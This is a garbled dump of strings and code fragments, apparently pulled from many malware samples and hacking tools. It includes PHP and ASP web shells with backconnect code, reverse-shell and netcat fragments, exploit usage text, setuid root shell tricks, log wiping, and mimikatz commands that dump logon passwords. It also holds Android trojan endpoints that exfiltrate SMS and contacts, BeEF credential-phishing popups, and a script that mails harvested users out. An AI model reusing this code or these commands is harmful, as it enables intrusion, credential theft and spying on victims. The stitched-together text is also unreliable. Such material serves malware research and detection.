\"success\";wp_enqueue_script(\"swfobject\");function funcqueueobject()add_action(\"wp_enqueue_scripts\", 'funcqueueobject');file_get_contents(\"http://pastebin.comxcurl('http://pastebin.com/download.phpxcurl('http://pastebin.com/raw.phpif($content){unlink('evex.php');$fh2 = fopen(\"evex.php\", 'a');file_put_contents($pthecho \"<login_ok>str_replace('* @package wordpress',$tempstring ivdt=\"-setusersetup\\r\\n-ip=0.0.0.0\\r\\n-portno=52521\\r\\n-user=binsqlexec : <asp:dropdownlist runat=\"server\" id=\"fgey\" autopostback=\"true\" oprocess[] p=process.getprocesses();response.cookies.add(new httpcookie(vbhln,password));[dllimport(\"kernel32.dll\",entrypoint=\"getdrivetypea\")]<p>connstring : <asp:textbox id=\"masr\" style=\"width:70%;margin:0 8px;\" cssclservicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();copyright &copy; 2009 bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_blaresponse.addheader(\"content-disposition\",\"attachment;filename=\"+httputility.nxedr.command+=new commandeventhandler(this.ivk);<%@ import namespace=\"system.serviceprocess\"%>foreach(string innersubkey in sk.getsubkeynames())response.redirect(\"http://www.rootkit.net.cn\");else if(reg_path.startswith(\"hkey_users\"))if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}@extract($_request[\"c99shcook\"]);if (!function_exists(\"c99_buff_prepare\"))echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">delete</option>\";if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}displaysecinfo(\"list of attributes\",myshellexec(\"lsattr -a\"));displaysecinfo(\"ram\",myshellexec(\"free -m\"));displaysecinfo(\"where is perl?\",myshellexec(\"whereis perl\"));$ret = myshellexec($handler);if (posix_kill($pid,$sig)) {echo \"ok.\";}$connection = @ftp_connect($ftp_server,$ftp_port,10);echo $lang[$language.'_text98'].$suc.\"\\r\\n\";$blah = ex($p2.\" /tmp/back \".$_post['backconnectip'].\" \".$_post['backconnectport'].\" &\");$_post['backcconnmsge']=\"</br></br><b><font color=red size=3>error:</font> can't backdoor host!</b>\";$_post['cmd'] = which('<option value=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">kernel attack (krad.c) pt1 (if wget installed)<center>kernel info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">which wget curl w3m lynxnetstat -atup | grep istelseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }<form method=\"post\"><input type=hidden name=act value=\"ls\">foreach($quicklaunch2 as $item) {echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">parent directory</option>\\n\";for (i=1; i<=frmupload.max.value; i++) str+='file '+i+': <input type=file name=file'+i+'><br>';if (frmupload.max.value<=0) frmupload.max.value=1;
1 previous command: set injection processes (status=0x%x)secondary injection process is <null> [no secondary process will be used]enter the address to be used as the spoofed ip source address (xxx.xxx.xxx.xxx) -> e: execute a command on the implantfullthreaddump.classthreadmonitor.classdeadlock$deadlockthread.class*
1 virtualprotectexinvalid parameterwinsta0\\defaultexplorer.execreateprocessasuserahttpendrequestagetmodulebasenameagetmodulefilenameexaenumprocessesspsssqproxy-authorization:basic kpstorecreateinstancefeb 04 2015i can not start %sdwconnectportdwremotelanportstrremotelanaddressstrlocalconnectip\
1 ati.jo840112-cras8468-11150923-pci8273vprincpespr!ncpeshastati\\temp\\~v3.logbrowser password recovery reportbrowserpassworddecryptorwww.securityxploded.comc:\\users\\bernardino\\appdata\\roaming\\berna@consultoreslegales.com.mx (1).pstmail password recovery reportmailpassworddecryptorc:\\users\\apant\\documents\\programdata\\abacus.ostc
1 c:\\documents and settings\\administrator\\got wmi process pid: %dthis exploit will executerunning reverse shell<description>chken qq:41901298</description>version=\"9.9.9.9\"name=\"ch.ken.tool\"to host!ss.exelstrlen0rtlunwnc -l -p port [options] [hostname] [port]invalid connection to [%s] from %s [%s] %dpost-rcv getsockname failedfailed to execute shell, error = %sudp listen needs -p arghttp://www.site.com/test.dll?user=%username&pass=%passwordusername: \"%s\", password: \"%s\", remarks: \"%s\"user:\"%s\" pass: \"%s\" result=\"%s\"mozilla/4.0 (compatible; msie 4.01; windows nt)l
1 downloadfile - exception:%s,code:0x%08x.mozilla/4.0 (compatible; msie 7.0; windows nt 5.1)cdllapp::initinstance() - evnet already exists../emptycriss <target ip>cut and paste the following to the telnet prompt:environ define ttyprompt abcdefrunning \\\"tcpdump -n -n\\\", on the environment variable \\$interface, scriptedcannot read $opetc/scripme.override -- are you root?$env{exploit_scripme}the encryption key is ___tempfile2.outunless the -c (clobber) option is used, if two retr commands of themywarn(\"end of $destfile determined by \\\"^connection closed by foreign host\\\"\")end of $destfile determined by \"^connection closed by foreign host> /var/log/audit/audit.log; rm -f .pastables to run on target:cp /var/log/audit/audit.log .tmphere is the first good cron session fromno need to clean login lines.sh >/dev/tcp/ <&1 2>&1test: mungedport=%6d pp=%d unmunged=%6decho \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"-x [ port to start mini x server on default = 12121 ]\"callback_port=32177usage: %s -e -v -i target ip [-c cert file] [-k key file]type=licxfer&ftp=%s&source=/var/home/ftp/pub&version=na&licfile=[-l log file] [-m save mac time file(s)] [-p server port]chown root sh; chmod 4777 sh;cp /bin/sh .;chown root sh;echo clean up when elevated:exe=$dir/sbin/ey_vrupdatedel --- usage: %s -l file -w wtmp -r userroasting ->%s<- at ->%d:%d<-rbnoil -roasting ->requested forwarding of port %d but user is not root.internal error: we do not read, but chan_read_failed for istate~# - list forwarded connectionspacket_inject_ignore: blockresult = self.send_command(\"ls -al %s\" % self.options.dir)cmd += \"d=-l%s \" % self.options.listen_portuse this on target to get your rat:$ratremotename && $command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>target is not vulnerable. exitingsending final buffer: evil_blocks and shellcode...timeout waiting for daemon to die. exploit probably failed.usage: %s <host> <port> e <contents of a local file to be executed on target>writing your %s to target.(e)xploit, (r)ead, (m)ove and then write, (w)rite-c command: shell command stringcannot combine shell command mode with args to do socket reuse-r: reuse socket for nopen connection (requires -t, -d, -f, -n, no -c)firing with the same hosts, on altername ports (target is on 8080, listener on 443)recieved unknown command payload: 0x%xusage: eslide [options] <-t profile> <-l listenerip> <targetip>-------- delete key - remove a *closed* tabusage: ./exp command display_to_return_tosizeof shellcode = %dexecve failed!echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"echo \"call back port2 = ${sport}\"* * * * * root chown root %s; chmod 4755 %s; %s[-] kernel not vulnerable[-] failed to spawn shell: %s-s shell use shell instead of %susage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]error: not vulnerableport=%d connected! xxx.xxxxxxexecuting ./ebbnew_linux -r %s -v %s -a %s %s -t %s -p %s./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772version 1 - start with option #18 first, if it fails then try this option%s is a wrapper program for ebbnew_linux exploit for sparc solaris rpc services# building shellcode into exploit.%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80# starting exhaustive attack against usage: $prog [-f directory] -p prognum [-v ver] [-t proto] -i ipadr$gotsunos = ($line =~ /program version netid address service owner/ );+ bruteforce mode.+ host is not running samba!+ connecting back to: [%d.%d.%d.%d:45295]+ exploit failed, try -b to bruteforce.usage: %s [-bbccdfprsstv] [host]** significantly improve processing time-c cmd_name: strncmp() search for 1st %d chars of commands that mysql \\$d --host=\\$h --user=\\$u --password=\\\"\\$p\\\" -e \\\"select * from \\$twindow 3: $0 -uadmin -ppassword -i127.0.0.1 -dipboard -c\\\"sleep 500|nc$ua->agent(\"mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)\");$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";usage: %s -i <ip_addr/hostname> -c <command> -t <target_type> (-u <port> | -t <port>) -i target ip address / hostname note: choosing the correct target type is a bit of guesswork.solaris rpc.cmsd remote root exploitif one choice fails, you may want to try another.shellfilecompleted.1zeke_remove%s/%s server failing (looping), service terminatedgetpwnam: %s: no such userexecv %s: %m%s/%s: unknown service?usage: %s <shellcode> <output_file>here is the decoder+(encoded-decoder)+payloadusage: %s hostip port cmd [printer_name]command must be less than 61 chars__rw_read_waiting__mutexkind__rw_psharedusage: %s [-v] -t <target_ip> -p porterror - shellcode not as expected - unable to fix upwarning - core wipe mode - this will leave a core file on target[-c] wipe target core file (leaves less incriminating core on failed target)-a <jumpaddr> (shellcode address)*** insane undocumented incremental port mode!!! ***%x:%d --> %x:%d %d bytesclient: can't bind to local address, are you root?unable to register portcould not resolve destinationraw troubles$gotgs=1 if (($line =~ /scan for (sol|snmp)\\s+version/) orusage: $prog [-f file] -p prognum [-v ver] [-t proto] -i ipadr$scanth = $scanth . \" -s \" . $scanthreads;print \"java -jar jscanner.jar$scanth$list\\n\";exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");$xargs=\"-title \\\"kill process $pid?\\\" -name \\\"kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;.tmp.%d.xxxxxx[-] couldn't create temp file/boot/system.map-%s[+] shellcode prepared, re-executing[-] kernel not vulnerable: prctl[-] shell failed[!] selinux apparently enforcing. continue [y|n]? t=<target ip> [o=<port>] y=<target type>no command given!! bailing...no port. assuming 22.../tmp/ratload.tmp.shremote usage: /bin/telnet locip locport < /dev/console | /bin/sh\"uncompress -f ${name}.z && path=. ${args1} ${name} ${args2} && rm -f ${name}exploit_scripme=\"$exploit_scripme\"deftarget=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`fatal error: -x port and -n port must not be the same.example: ewok -t target publicusage: cleaner host community fake_prog-g - subset of -m that green spirit hits --- ewok versionusage: xspy -display <display> -delay <usecs> -upchown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cronusage: $0 ( -s ip port | cmd )os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$cmd\")php_script=\"$home/public_html/info$x.php\"cat > /dev/tcp/127.0.0.1/80 <<end*** sorry about the raw output, i'll leave it for now-scan winn %s oneset uremoteuploadcommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"send \"\\[ \\\"\\$bash\\\" = \\\"/bin/bash\\\" -o \\\"\\$shell\\\" = \\\"/bin/bash\\\" \\] &&system rm -f /current/tmp/ftshell.latest# ftshell -- file transfer shellwelcome to the network scanning toolscanning port %d/current/down/cmdout/scansscan for ssh versionprogram vers proto port serviceusage: %s [-v os] [-p] [-r] [-c command] [-a attacker] targetsending shellcode as part of an open command...cmdshellcodeyou will not be able to run the shellcode. exiting...e.g.: -n 1-1024,1080,6666,31337 # default is to dump out all scanned hosts found$bool .= \" -r \" if (/mibiisa.* -r/);sadmind is available on two ports, this also works)-x ip gives \\\"hostname:# users:load ...\\\" if positive xwin scanheader(\"set-cookie: bbsessionhash=\" . \\$hash . \"; path=/; httponly\");if ($code =~ /proxyhost/) {\\$rk[1] = \\$rk[1] - 1;#existsuser($u) or die \"user '$u' does not exist in database.\\n\";temp = ((left >> 1) ^ right) & 0x55555555right ^= (temp << 16) & 0xfffffffftempresult = \"\"num = self.bytes2long(data)if { [string length $uremoteuploadcommand]processuploadglobal dothisreallyquiet[-] failed to map file: %s[-] can not null terminate input data[!] name has size of 0!rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')client_auth = binascii.hexlify(lo_execute('openssl rand 16'))[%.2u%.2u%.2u%.2u%.2u%.2u]0123456789abcdefabcedf:a}%j,r
1 banner_layoutactivity_adpath_smsadpath_title_one7291-2ec9362bd699d0cd6f53a5ca6cdstart_serviceextra_key_smsandroid.provider.telephony.sms_receivedmphonenumbercnlybnq.qrk" // encrypted string "payload.dexcardholder nameinstagram.phpupd.php?text=android.app.action.add_device_admintap activate to continue with software update/upload-pictures.php?opened dialog:com/connect/myserviceandroid/os/binderandroid/app/servicedroidiandroidianserviceservicereceiverdendroidlastgamefile:///android_asset/enablecheatshttp://112.74.111.42:8000sha1-digest: oix4iywettkib4fbh7hconehuae=onlinegameprocedure_which_wap_idhttp://da.mmarket.com/mmsdk/mmsdk?func=mmsdk:posteventlogsha1-digest: +rsrtx5snjstrnt7pnaeqazy4kc=sha1-digest: rt2orts0wwtjffgletgffix1dfe=http://image.baidu.com/wisebrowse/index?tag1=%e6%98%8e%e6%98%9f&tag2=%e5%a5%b3%e6%98%8e%e6%98%9f&tag3=%e5%85%a8%e9%83%a8&pn=0&rn=10&fmpage=index&pos=magic#/channelpitchfork=022d4notlefttriangleequal=022ecsha1-digest: x27zpw9c6eyxvefuzfcl2lmumti=_znst12_vector_baseisssaissee13_m_deallocateepssjfbtp2ahr3wkc6leyon7d5gzxvismj4qulibgodlikelib.solibroot.sosilent91_arm_bin.rootlibr.solibpl_droidsonroids_gif.so41.208.110.46winmeif.myq-see.comwininit.myq-see.comsamsung.ddns.mecollge.myq-see.comsara2011.no-ip.bizandroidmanifest.xmlres/drawable-xxhdpi/ok_btn.jpgbot_idtype_password2decrypt.malloc.memset.free.pluginsms_encrypt.java_com_skymobi_pay_common_util_localdatadecrpty_encrypt.strcpy%ioperator%%imodel%%ideviceid%%ipackname%villllll280128120000z0w1e6fff4c5062fbdc9886fec93a75d2ac1121120104150z&inbox_timestamp > 0 and is_permanent=1contact_id = ? and mimetype = ?863d9effe70187254d3c5e9c76613a99nv-sa1nd your's device will reboot and!2,.b99^ggd&r-22922222222222222222q^saawat2222222222229222q^saawabuildiddcef055eee3f76cabb27b3bd7233f6e3c143d55d996634d1b761709372042474find_valid_domain6589y459zactivitylcom/android/zics/zruntimeinterfacemigfma0gcsqgsib3dqebaquaa4gnadcbiqkbgqc/jvgb0/jsrwi7i4j9iwo72kzw404kj02a97exbuefvee7yywstbkw5sylkxctaoqwwr19j0y+xb6+h2brunx307bv/qpg6dnpg+lx8fppvhbhoudgkb/xuzpaz/gjbtpwztbbmt+mi1qtrlyakdxsjgwyvopfvz82rxcablv/twidaqabmiiceaibadanbgkqhkig9w0baqefaascamiwggjeageaaogbal8m+bvt+njfalulgn0ja7vypndjtisptyd3stftr59v4tvljzjnsrdmxiupck1qhdbavx2prj7fvr6hyfg43hftsfx9ckbooc+d4vhx88++fue652apv9e5k9rp8yltondnnsgzp6yjvbneviaopfkmzzi+g8vxpzzhfwbuvx+3agmbaaecgyblyr6uoquapozqjtvia5bpx0ijej+ygybzh1qs3z9e4itz42rpkwjkchds6eia2kpolznqbbmrv4e8ut3ufcvufexjr5clgvkj+xhxxqs75+kt38wgzz1bw0pk4st1/aglrt5/netwuzmi/yfnfakrpqvrxuncxnlhmhs2eflkiqjbapgea2uxvwd0ti8cla8hiwpsncptcp41dh2h0yczrfmo2zafppjih2gqy5txszwblbjxfcy8/whryaqx0itmrgscqqdkh5u1nfprvk0hu8ibrb/lpygimz+wm/chfsc65sls/cml3u7huoj2lrgpz+bm68624h0klviqpbjpmayvbbyfakea1nnfj9uax8rdn1b3ecjpmvqqimdjwyvcnjjq7/wnj6nu3+0toxc0xrsheigtbhrfsnrxc6kfuv3budbhvwog9wjbai+frh1ekowlaqviundw6ycndwhedhysz0tdodlhp112ieign06dpsgyjsmqurntb92cjsnw82c3r2nhmicxr60cqqcn466jf9gjrzipo64oyw/elmac7vxgtegmvyz2/yfx5crclua4dygd1ju0emxpea9og/etwctv0rvpfc9ssn8vhhheeeeeebbbbbb??????;;;;;;888888444444000000,,,,,,''''''''''''######ooo###2e6081a2-a063-45c7-ab90-5db596e42c7cmsacm32.dllmain_text_tag080229013346z350717013346z0number_char_exp_signloganberryapplicationattachbasecontextobstetricres/xml/device_admin_data.xml]data:image/png;base64,ivborw0kggoaaaansuheugaaaiaaaacabamaaaaxehz4aaaagfbmvevmaxguwuwtweatweatweatweavwuwtwealnfqiaaaab3rstlmalozouetympn8xgaaabfjrefuef7t2e9l+zacx/fp1i3n7pfhxauivw7k3hway1dfonci2l61lvs8fuoxzyw22rdbbub1an4kx7kqdqcvcilgdc0aulcghzaq+j/hab2hlc5butxeeomglgzikzkaledtakm95hsjpxs6t9eyrsghzmmvuyxkolzs2axycq98gei9sqwekgyb1/inmgutfw9irdlwdwghtuqcegw5a+zigwn5aqfvjq0zviwqkywfgyjvcordffbdtgmyu80mkfc2h5soxfglxbiqyg9b2xzhgrodzagzdiofm+y0e5zjthbhurzthl9bb24m8hlfzqcxt+cysix3qmjubn9jazz3clobwirko+8izvsdmk7po4lv/yexpt/rxboi6njtciraciracita2bey0xnod4x8d5wittwfuknnravscof+aarfk/cfbtwu0cveydduycganyxpykbx+oeqkl772i7yas/+cg+zmy6m8vyfdnonqpv5nkfkvi+tvmwaxxkigrdqdgxzo7xbsqx1b9qezhpibcmhei3wqeyn9d9fr+qccji7yfdb8zv+qhaeqfajcs5k2taqqxaaaaaasuvork5cyii=device_admin_descpillagedactivityepigraphyservicexbot007:write apk file (from txt in assets) to sdcard sucessfully!4write apk (from txt in assets) file to sdcard fail!138675150963res/xml/device_admin.xmldevice registered: regid =cmvudcymjg==dxnzzcymjg==hdnrq2golmlelvyohc9y1x+nzvuejw8w3sbuacertificado # 73828394a compania tmn informa que o vosso sistema android tem vulnerabilidadeandroid.app.extra.add_explanationdevice_policycontent://sms/#admin_startkill callunstop all numbers*lcom/metasploit/stage/payloadtrustmanager;(com.metasploit.stage.payloadtrustmanagerlcom/metasploit/stage/payload$1;lcom/metasploit/stage/payload;-com.metasploit.meterpreter.androidmeterpreter,lcom/metasploit/stage/mainbroadcastreceiver;#lcom/metasploit/stage/mainactivity;lcom/metasploit/stage/a;lcom/metasploit/stage/c;lcom/metasploit/stage/b;android.engine.apktel:locknowcmd_confsms_conffilter2arnrsiec sisanirhguecisoijng tsassets/data.dbres/xml/device_admin_sample.xmlpkselen3333http://mayis24.4tubetv.xyz/dmr/yanpkiportraitcallback(android.app.extra.device_adminsmsreceiver&imsi=com.ahnlab.v3mobileplus#intercept_sms_start#intercept_sms_stop#block_numbers#wipe_datavisa electrone!qqazxs__exidx_endres/layout/notify_apkinstall.xmlpkpluginsms_decrypt__dso_handlelib/armeabi/libmylib.sout]diok\"3|0597794205new victim arrivedhttp://ksa-sef.com/hack%20mobaile/addnewsms.phphttp://ksa-sef.com/hack%20mobaile/addalllogcall.phphttp://ksa-sef.com/hack%20mobaile/addscreenshot.phphttp://ksa-sef.com/hack%20mobaile/addsms.phphttp://ksa-sef.com/hack%20mobaile/addvcf.phphttp://ksa-sef.com/hack%20mobaile/addimsi.phphttp://ksa-sef.com/hack%20mobaile/addhistoryinternet.phphttp://ksa-sef.com/hack%20mobaile/addinconinglogs.phpodnotice.txtcamera this device has camera!camera this device has nooo camera!send|1sbdbbbbbbf|k|send|372|screamsms|senssdsend|5ms5gs5anncsend|45clclca01send|999sand|timestart!s!c!r!e!a!m!server_ipserver_namecontent://sms/inboxscreamhackerscreamondroid.pnggetsrvaddrgetsrvportandroid.intent.action.start_google_servicejavascript:scrolltojavascript:document.getelementbyid('dns1')admin:101.200.147.153112.33.13.11120.76.249.59svcdownload<config><apptitle><txinicio><txiniciotitulo><txnored><txnoredtitulo><txnoredretry><txnoredsalir><laurl><txquieresalir><txquieresalirtitulo><txquieresalirsi><txquieresalirno><txfiltro><txfiltrourl><posicion>android/system/popreceiver/get-functions.php?/new-upload.php?/message.php?/get.php?cv7obbkpvc2pvjmwsfhzxhhttp://joyappstech.biz:11111/knock/i hate testers ongloballayouthttp://144.76.70.213:7777/ecspectapatronum/6589y459gj4058rtq,hu4p#ht;u!xo7t,ud+gkwg#m!lf>laq&+j{lgvar lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';dark=document.getelementbyid('darkenscreenobject'); beef.execute(function() {var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';description.text('enter your apple id e-mail address and password');sneakydiv.innerhtml= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +tivar logo = 'https://www.yammer.com/favicon.ico';beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);var title = 'session timed out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"linkedin\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"youtube\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"yammer\">';var logobox = 'style=\"border:4px #84acdd solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';sneakydiv.innerhtml= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>your session has timed out!</h2><p>forinner.append(title, description, user,password);sneakydiv.innerhtml= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_baranswer = document.getelementbyid('uname').value+':'+document.getelementbyid('pass').value;password.keydown(function(event) {j@h
1 \x00cmd.exe\x00\x00sethc.exe\x00\x00debugger\x00\x00software\\microsoft\\windows nt\\currentversion\\image file execution options\x00set xpost = createobject(s1):xpost.open \"get\",iremote,0:xpost.send()set sget = createobject(s2):sget.mode=3:sget.type=1:sget.open()wsh.echo \"rcmd v1.01 by netpatch\"wsh.echo \"read.vbs created!!!\"wsh.echo \"cscript \"&wscript.scriptfullname&\" targetip username password commandauthentication id:authentication package:authentication domain:primary user:* user: * domain: * password: -slave-listenwating on port %d...\x0aend waiting2\x0a
1 $%!aaaaaa1|aaaaaa2|aaaaaa3|aaaaaa4|aaaaaa5|%s%d.exeastalavistagivemecache%s\\system32\\drivers\\blogs\\*bndk13merandom-number-hereconfig.txta/a/a/a/f.classa/a/a/a/l.classa/a/a/b/q.classa/a/a/b/v.classmachinedetailsmysettingssendftppasswordssendbrowserpasswordsarma2keymasskeylogger
1 invalid password hash: %s-= mysql hash cracker =- usage: %s hashhash: %08lx%08lxfound pass: pass not foundt
1 %d of %d target%s%scompleted, %lu valid password%s found[%d][smb] host: %s account: %s error: account_change_passwordhydra -p pass.txt target cisco-enable (direct console access)[%d][smb] host: %s account: %s error: password expired[error] smtp login auth, either this auth is disabled\"/login.php:user=^user^&pass=^pass^&mid=123:incorrect\"used pepack!\\temp\\ntgodmode.exentgod.batsfxcmdc:\\temp\\vncviewer4.log[bl4ck] patched by redsand || http://blacksecurity.orgfake release extendedvkey 0x%x, keysym 0x%xpipecmd \\\\%s -u:%s -p:\"\" %s[usage]: %s <hostname|ip> <username> <password>pipecmd \\\\%s -u:%s -p:%s %s============by uhhuhy (feb 18,2003) - http://www.cnhonker.net===================================ntcmd v0.11 for hscan v1.20=======================ntcmd>mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txtsuccessfully --> username %s password %s zhouzhen@gmail.com http://zhouzhen.eviloctal.org-a automode automatic crack the mysql password mysql_pwd_crack 127.0.0.1 -x 3306 -ac
1 get_badloginaddressget_lastfailedloginads_uf_encrypted_text_password_allowedget_passwordexpirationdatebin_execsql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + bin_textbox_saveptc.text=\"<a href=\\\"javascript:bin_postback('zcg_closepm','\"+bin_tobase64(de.key.tostring())+\"')\\\">close</a>\";bin_execsql(\"if object_id('bin_temp')is not null drop table bin_temp\");-slave <connecthost> <connectport> <transmithost> <transmitport>[+] make a connection to %s:%d....cmshared_get_ptr_from_atom_cmshared_get_ptr_from_atom[-] transmitport invalid.[+] waiting for client on port:%d ......\\setup.exemsi.dll.urlutmsi.dllutsetup.exeut/c del /q %sp
1 connecting http port - result: no space for command line argument vectormicrosoft(july/1999~) http://www.microsoft.com/technet/security/current.aspno space for copy of command line- windows nt,2000 patch method - scanf : floating point formats not linkedhrdir_b.c: loadlibrary != mmdll borlndmm failed!\"what?\"%s port %d closedprintf : floating point formats not linkedxxtype.cpp-err invalid command, type [help] for command list-err get sms users id failedcontrol time out 90 secs, connection closed-err post sms failedcurrent.hlthistroy.hlt-err send sms failed-err change password <new password>+ok send sms succussifully+ok set new password: [%s]change passwords:\\ammyy\\sources\\target\\trservice.cpps:\\ammyy\\sources\\target\\trdesktopcopyrect.cppglobal\\ammyy.target.incomeports:\\ammyy\\sources\\target\\trfmfilesys.cppplease enter password for accessing remote computercreateprocess1()#3 %d error=%dchttpclient::sendrequest2(%s, %s, %d) error: invalid host name.error: createprocessasuser() error=%d, session=%derror: findprocessbyname('explorer.exe')or: %s -r [host.tty]%s: process: character, ^x, or (octal) \\032 expected.type \"screen [-d] -r [pid.]tty.host\" to resume one of them.%s: at [identifier][%%|*|#] command [args]slurped only %d characters (of %d) into buffer - try againcommand from %s: %s %s[ passwords don't match - your armor crumbles away ][ passwords don't match - checking turned off ]writing packet : error on socket (or connection closed): %sremote connection closed by signal sig%s %sreading private key %s failed (bad passphrase ?)server closed connection%s: line %d: list delimiter not followed by keywordchecking for version `%s' in file %s required by file %sremote host closed connection%s: line %d: bad command `%s'verifying that server is a known host : file %s not found%s: line %d: expected service, found `%s'%s: line %d: list delimiter not followed by domainpublic key from server (%s) doesn't match user preference (%s)# pscan completed in %u seconds. (found %d ips)usage: %s <b-block> <port> [c-block]%s.%d.* (total: %d) (%.1f%% done)invalid ip.# scanning: unable to allocate socket.cat trueusers.txt | mail -s \"eyes\" clubby@slucia.commv scan.log bios.txtrm -rf bios.txtecho -e \"# by eyes.\"././pscan2 $1 22echo \"#cautam...\"echo -e \"${blu}private scanner by raphaello , demmonn , tzepelush & drac\\n\\rkillall -9 pscan2echo \"[*] ${dcyn}gata esti h4x0r ;-)${res} [*]\"echo -e \"${dcyn}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${res}\"snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);printf(\"usage: %s <b-block> <port> [c-block]\\n\", argv[0]);printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - scaconnlist[i].addr.sin_family = af_inet;snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\",wscript.echo \" $$\\ $$\\ $$\\ $$\\ $$$$$$\\ $$$$$$$$\\ $$\\ $$\\ $$$$$$$$\\ $$$$$$plug-in thread causes an exception, failed to alert user.pluggetudpportpluggettcpportpluggetvulnnum\\\\.\\pipe\\pipecmd_communicatonpipecmd servicel
1 %s - simple sniffer for win2000 -pass : filter username/password -udp : output udp packets -tcp : output tcp packetsfscan v1.12 - command line port scanner. -n - no port scanning - only pinging (unless you use -q)example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200 -z - maximum simultaneous threads to use for scanningfailed to open the ip list file \"%s\" -p - tcp port(s) to scan (a comma separated list of ports/ranges) bind port number out of range. using system default.f
1 /c c:\\progra~1\\msbuild\\temp\\7za.exe e -oc:\\progra~1\\msbuild\\temp\\ c:\\progra~1\\msbuild\\temp\\inf.7z -p122333444455555 -y/c c:\\progra~1\\msbuild\\temp\\32.exe privilege::debug \"sekurlsa::logonpasswords full\" exit > c:\\progra~1\\msbuild\\temp\\%s.txt/c c:\\progra~1\\msbuild\\temp\\64.exe privilege::debug \"sekurlsa::logonpasswords full\" exit > c:\\progra~1\\msbuild\\temp\\%s.txt/c c:\\progra~1\\msbuild\\temp\\crypt.exe --encrypt c:\\progra~1\\msbuild\\temp\\public.key c:\\progra~1\\msbuild\\temp\\%s.txt c:\\progra~1\\msbuild\\temp\\%s.inc/c attrib +h +s c:\\progra~1\\msbuild\\temp
1 ersingscandelete-tcbtime-wait1last-aclosing!fin!syn-receiv%cget %s 's password error!software\\microsoft\\active setup\\installed components\\{e3df6b419d1f}<start application 2 key><start application 1 key><select media key><start mail key><play/pause media key>0
1 software\\microsoft\\windows nt\\currentversion\\winlogon\\notify<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestversion=\"1.0\"><trustinfo xmlns=\"urn:schemas-microsoft-com:asm.v3<supportedos id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"></supportedos>getpassword1nvsmartmax.dlllicensedlgc
1 @@for /f \"delims=\" %%i in ('findstr /smc:\"%s\" *.msg') do if not \"%%msgfile1%%\"==\"%%i\" del /f \"%%i\"logging out of webadmin (as target account)[+] connected to the registry servicef08d49ac41d1023d9d462d58af51414daff95a6a[+] checkcredentials(): checking to see if valid username/passworderror connecting to target, tbmakesocket() %s:%d.nterrormoreprocessingrequiredcommand format error: error=%xnterrorpasswordrestriction
1 s.failed_logins \"failed login attempts\", select role, password_required from sys.dba_roles order by roleselect spid 'spid', status 'status', db_name (dbid) 'database', loginame 'login'bcp.exe <:schema:>.<:table:> out \"<:file:>\" -n -s <:server:> -u <:user:> -p <:l.login_policy_name as \"login policy\", mailto:support@sqldbx.coms.last_login_time \"last login\", [ ] resolving pslookupprocessbyprocessidthe target is most likely patched.dojibiron by ronald huizer, (c) master@h4cker.us .[ ] creating evil window%shandlef_indestroy[+] set to %d exploit half succeeded/churraskito/-->usage: churraskito.exe \"command\" fuck,can't find wmi process pid./churraskito/-->found token %s wmiprvse.exeselect * from iiswebinfoip - %d; login - %d; password - %d; combination - %dip - 0; login - 0; password - 0; combination - 0create %d ip@loginl;passwordubrute.comhttp://210.73.64.88/doorway/cgi-bin/getclientip.asp?ip=n
